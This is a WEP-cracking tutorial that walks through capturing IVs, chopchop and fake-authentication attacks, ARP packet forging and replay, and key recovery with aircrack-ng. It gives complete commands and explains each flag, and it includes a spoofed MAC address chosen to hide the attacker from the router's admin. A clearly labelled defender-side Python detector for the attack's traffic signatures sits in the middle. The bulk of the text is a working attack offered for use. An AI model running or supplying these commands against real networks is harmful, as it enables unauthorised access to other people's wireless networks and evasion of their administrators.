Wep Cracking Tutorial
Hi, in this tutorial I will be showing you how to crack WEP without any traffic on the network.
To use this tutorial you need to have packet injection working with your wireless card, Kismet, the aircrack suite, arpforge and a small amount of Linux knowledge (enough to open Konsole and put your card into monitor mode).
For this tutorial I have used the BackTrack (www.remote-exploit.org) Linux distribution, as it contains all the programs and it was easy to get packet injection working for my driver.
My set-up:
Dell Inspiron 1300 with an Atheros wireless card running BackTrack (I will refer to this as BT), and my D-Link DI-524 router, which is set to 128-bit encryption and has nothing else connected wirelessly.
After you boot into BT (or any other distro you are using), put your card into monitor mode.
Start Kismet; we will use Kismet to find out the information we will need about the AP we wish to hack.
Kismet will show all the wireless access points in range.
I only have one in range (called Crossover) but you may have more around you.
Press s then b; this will let you scroll up and down the list until you find the AP you wish to crack, then press enter.
This will give you more information about the access point. Make a note of its name, the channel it is on and the BSSID (you can leave Kismet open and just come back to it later to get the info), and also make sure it is WEP, as this tutorial is for WEP only.
We will now run airodump to capture the IVs (data) we will need to crack the WEP key.
Open a new Konsole and run "airodump-ng"; this will show you all the possible options you can use with this application.
We only need to capture, so we will use -w, which names the file we are capturing to, and -c to specify a channel, which makes it easier for us to capture the data from our AP.
I am going to call my file "weptutorial" and my channel (the channel Kismet shows) is 8. We will also need to add the interface to use at the end of the command; iwconfig can show this, but hopefully you already know it. Mine is ath1.
Here is the command I will use:
airodump-ng -w weptutorial -c 8 ath1
We should see our AP come up; we might have some traffic on it, we might not.
I don't have any data on mine (as I have no wireless devices connected to it).
Now we are capturing data; we will need about 200 000 to 1 000 000 of these IVs to crack WEP.
While that is running, open a new Konsole and we will now speed up the traffic (if you have wireless devices and the data count is going up fast enough then you do not need to do this stage).
We will now set up a method called chopchop. This is in aireplay-ng (run "aireplay-ng" like we did airodump-ng to see all the options) and it will capture data and resend it over and over to create traffic on the network so we can capture more.
The command to do this is:
aireplay-ng --chopchop -b 00:0F:3D:3D:94:72 ath1
aireplay-ng = the program name
--chopchop = the attack we are using
-b 00:0F:3D:3D:94:72 = our AP's MAC address (Kismet has this info and airodump also shows it)
ath1 = our network interface
aireplay will keep reading packets until it finds one that it thinks contains an IV (data containing the WEP). If your network has wireless traffic on it then you should get one soon; if not (like me) then we can fake authentication with the AP and hopefully it will throw a packet or two out that we can catch.
To do this we open another Konsole and use the aireplay-ng command again, but with a different attack method:
aireplay-ng --fakeauth 50 -e Crossover -a 00:0F:3D:3D:94:72 -h 11:22:33:44:55:66 ath1
aireplay-ng = the program name
--fakeauth 50 = the attack we are using, with a delay of 50
-e Crossover = the name of the AP
-a 00:0F:3D:3D:94:72 = our AP's MAC address
-h 11:22:33:44:55:66 = a fake MAC address for us to attack from, so the router's admin cannot see our real MAC address
ath1 = our network interface
We should see "Sending Authentication Request" followed by "Authentication successful".
After a while the attack will stop, but just re-run the command again.
airodump will also show our new fake MAC as connected to the AP.
Hopefully the chopchop method we started will now catch some data; press y to let it send it. It will do something like this screenshot.
You will notice airodump has gone crazy too, with lots of clients connected to the AP.
Let it run its magic until the chopchop hits 100%.
Now we have a .cap and a .xor file; we will turn this into a file we can send back to the AP.
To do this, run an app called arpforge-ng.
This will edit the capture slightly; I am not going to go into detail about this app.
arpforge-ng replay_dec-0831-173203.xor 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 arp.cap
arpforge-ng = the program name
replay_dec-0831-173203.xor = the xor file that was caught by the chopchop method; yours will be slightly different
1 = the type we are using
00:0F:3D:3D:94:72 = the AP's MAC address
11:22:33:44:55:66 = our fake MAC
source IP = this can be anything
destination IP = this is the AP's IP
arp.cap = the new capture file name
After this it will say done.
We will now send this modified capture file lots of times, and very fast; this will make the data count in airodump go up.
aireplay-ng --interactive -r arp.cap ath1
Press y when it asks if you want to send this packet.
The data count in airodump should now be rising very fast.
At this stage you can stop the fake auth with ctrl+c. Wait until you have about 100 000 before moving on (this may take a while); mine is doing about a hundred a second, so make a brew.
When it hits around 100 000 we can start to crack the WEP key; we will leave the rest running and catching data, as it will improve our chances.
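The injection stage described above leaves two very distinctive signatures on the air that a wireless IDS or a monitor-mode sensor can pick up: a long run of authentication requests from a single station, and one encrypted frame retransmitted byte-for-byte many times with the same IV. The following detector is an added example written from the defender's side; it is not part of the tutorial or of the aircrack-ng suite. The frame records, the legitimate client MAC, the timing and the alert thresholds are all constructed for illustration; a real deployment would feed it frames parsed from a monitor-mode capture.

```python
"""Defender-side detector for the traffic patterns an ARP-replay plus
fake-authentication WEP attack produces (added example; not from the tutorial).
The frame records, thresholds and the legitimate client MAC below are
constructed for illustration."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Frame:
    t: float                  # capture time in seconds
    kind: str                 # "auth" (authentication request) or "data"
    src: str                  # transmitter MAC
    bssid: str                # AP the frame belongs to
    iv: Optional[int] = None  # 24-bit WEP IV, data frames only
    body: bytes = b""         # encrypted payload, data frames only


def auth_storm(frames: List[Frame], window: float = 10.0, threshold: int = 20) -> Dict[str, int]:
    """Return stations whose authentication requests exceed `threshold` inside
    any sliding `window` of seconds, mapped to their peak count. A fake-auth
    run re-sends authentication every few seconds for as long as it is left
    going; a real client authenticates once or twice."""
    times: Dict[str, List[float]] = defaultdict(list)
    for f in frames:
        if f.kind == "auth":
            times[f.src].append(f.t)
    flagged: Dict[str, int] = {}
    for src, ts in times.items():
        ts.sort()
        peak, lo = 0, 0
        for hi, t in enumerate(ts):
            while t - ts[lo] > window:  # slide the window's left edge forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            flagged[src] = peak
    return flagged


def replayed_frames(frames: List[Frame], min_repeats: int = 50) -> Dict[Tuple[str, int], int]:
    """Return (src, iv) pairs whose encrypted frame was retransmitted verbatim
    at least `min_repeats` times. A WEP station picks a fresh IV per frame, so
    a byte-identical (IV, ciphertext) pair seen hundreds of times is the
    signature of an injected replay, not of normal link-layer retries."""
    seen = Counter((f.src, f.iv, f.body) for f in frames if f.kind == "data")
    return {(src, iv): n for (src, iv, body), n in seen.items() if n >= min_repeats}


def iv_reuse_ratio(frames: List[Frame], bssid: str) -> float:
    """Fraction of data frames on `bssid` whose IV had already been seen.
    Near 0 on a healthy network; it climbs sharply while a replay is running."""
    ivs = [f.iv for f in frames if f.kind == "data" and f.bssid == bssid]
    if not ivs:
        return 0.0
    return 1.0 - len(set(ivs)) / len(ivs)


# Constructed sample: one legitimate station and one injecting station.
AP = "00:0F:3D:3D:94:72"    # BSSID used in the tutorial
REAL = "00:11:22:33:44:55"  # constructed legitimate client MAC (hypothetical)
FAKE = "11:22:33:44:55:66"  # the spoofed client MAC from the tutorial


def sample_frames() -> List[Frame]:
    frames: List[Frame] = []
    # Legitimate client: two auth requests, then 200 data frames with fresh IVs.
    frames += [Frame(1.0, "auth", REAL, AP), Frame(1.2, "auth", REAL, AP)]
    frames += [Frame(2.0 + i * 0.05, "data", REAL, AP, iv=1 + i, body=bytes([i % 256]) * 40)
               for i in range(200)]
    # Injecting station: 50 auth requests in 5 s, then one encrypted ARP-sized
    # frame replayed 500 times with the same IV and the same ciphertext.
    frames += [Frame(100.0 + i * 0.1, "auth", FAKE, AP) for i in range(50)]
    frames += [Frame(110.0 + i * 0.01, "data", FAKE, AP, iv=0x123456, body=b"\xaa" * 36)
               for i in range(500)]
    return frames


def analyse(frames: List[Frame]) -> Dict[str, object]:
    """Run all three checks and return their results keyed by name."""
    return {
        "auth_storm": auth_storm(frames),
        "replays": replayed_frames(frames),
        "iv_reuse": iv_reuse_ratio(frames, AP),
    }


if __name__ == "__main__":
    for name, result in analyse(sample_frames()).items():
        print(f"{name}: {result}")
```

On the constructed sample the auth check flags only the spoofed station, the replay check reports the single (station, IV) pair sent 500 times, and the IV reuse ratio for the AP is about 0.71 where a healthy network sits near zero. Detection of this kind is a stop-gap: the IV reuse it measures is inherent in WEP, and the only real mitigation is moving the network to WPA2 or WPA3.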
Cracking Time
Open a new Konsole and run the command "aircrack-ng" to see all the possible options; we will only be using a few.
aircrack-ng -a 1 -e Crossover -b 00:0F:3D:3D:94:72 weptutorial-02.cap
aircrack-ng = the program name
-a 1 = this chooses what we are cracking: 1 = WEP, 2 = WPA-PSK
-e Crossover = the AP name
-b 00:0F:3D:3D:94:72 = the AP's MAC address
weptutorial-02.cap = the capture file you named when you started airodump. It will probably add -01 to yours, but as I already had one called that it made mine -02; just use tab to find out or look in the folder.
It is now testing your keys and hopefully this will find your key (this will also take time, make a sandwich).
Remember, the higher the encryption the longer it can take.
If aircrack fails, just restart it and let it catch more data; for this tutorial I needed over 800 000.
This key (ModShackHack1) took me 1 hour 20 mins to crack; some may take less time, some may take more.
Hope you crack your WEP. -------------McScruff